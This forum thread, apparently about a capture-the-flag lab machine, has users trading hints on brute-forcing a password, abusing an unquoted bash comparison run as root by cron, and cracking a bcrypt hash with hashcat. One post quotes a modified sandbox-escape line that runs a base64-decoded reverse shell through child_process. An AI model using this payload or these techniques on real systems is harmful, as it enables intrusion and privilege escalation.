Posts: 12
Threads: 0
Joined: Nov 2023
(Nov 05, 2023, 06:53 PM)0BL1V10N Wrote: (Nov 05, 2023, 04:56 PM)intersteller2038 Wrote: (Nov 05, 2023, 04:20 PM)0BL1V10N Wrote: (Nov 05, 2023, 04:10 PM)intersteller2038 Wrote: (Nov 05, 2023, 07:17 AM)xts Wrote: i got mysql password but how i use it for root?
Where did you find the pass?
You can bruteforce the password, just use the script that user rwwwshell posted above
Got it, but is there any other way of solving the machine?
Yes, you can run the sudo command and then pspy and you will find something interesting
Ye I had done that, the user can run a .sh file as root and also that file is running as a cronjob. my question was is there a way to root the machine without using script? That .sh file can't be edited/moved/removed so...
Posts: 13
Threads: 0
Joined: Oct 2023
For root: search for unquoted variable comparison, how it compares. Remember this: "You CAN'T escape the if statement." A single thing can exploit it. But remember to look through pspy.
It's an easy box. But root isn't easy, unless you find the solution. Then you'll laugh at yourself.
Posts: 25
Threads: 0
Joined: Oct 2023
What payload did you used in order to get the rev shell before escalating to user? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 50
Threads: 4
Joined: Sep 2023
(Nov 06, 2023, 08:40 PM)th3visitor Wrote: What payload did you used in order to get the rev shell before escalating to user?
Hey man! Dont know if you are still stuck, but this is what i used:
https://gist.github.com/leesh3288/381b23...90cc8bb244
I also got stuck because there are 2 or 3 CVE that are almost the same. Good luck with the machine, and if you need help, send a message. Always glad to help!
Posts: 3
Threads: 0
Joined: Sep 2023
(Nov 04, 2023, 09:02 PM)hdddjik224636rggggq Wrote: (Nov 04, 2023, 08:38 PM)m1lk Wrote: (Nov 04, 2023, 08:36 PM)blade33 Wrote: (Nov 04, 2023, 08:32 PM)m1lk Wrote: (Nov 04, 2023, 08:26 PM)chillywilly Wrote: after a little poking around i found a hash
how did you get hash
look at /var/www/contact/
thanksss
If are having toruble cracking it it's bcrypt and the command for hashcat is hashcat -a 0 -m 3200 hashes.txt wordlist.txt -w 3
used same command Hashcat is not decrypting giving me some shit errors about hash length and separator any advise please
Posts: 312
Threads: 7
Joined: Oct 2023
Posts: 9
Threads: 0
Joined: Aug 2023
(Nov 04, 2023, 11:49 PM)nenandjabhata Wrote: (Nov 04, 2023, 11:36 PM)ajasjas Wrote: Unescaped variable use in conditionals can be influenced to always validate true.
I found this poc, "https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550" But i don't know how to use.
Can you help for foothold user
I used this POC https://gist.github.com/leesh3288/381b23...90cc8bb244 and modified this line:
c.constructor('return process')().mainModule.require('child_process').execSync('echo base64reverseshellgoeshere | base64 -d | bash');
If you get command can't run errors, then reset the machine. I think it gets flaky if too many child_processes are running. Banged my head against that until I said fuck it and reset the machine.
When in doubt reboot 
|
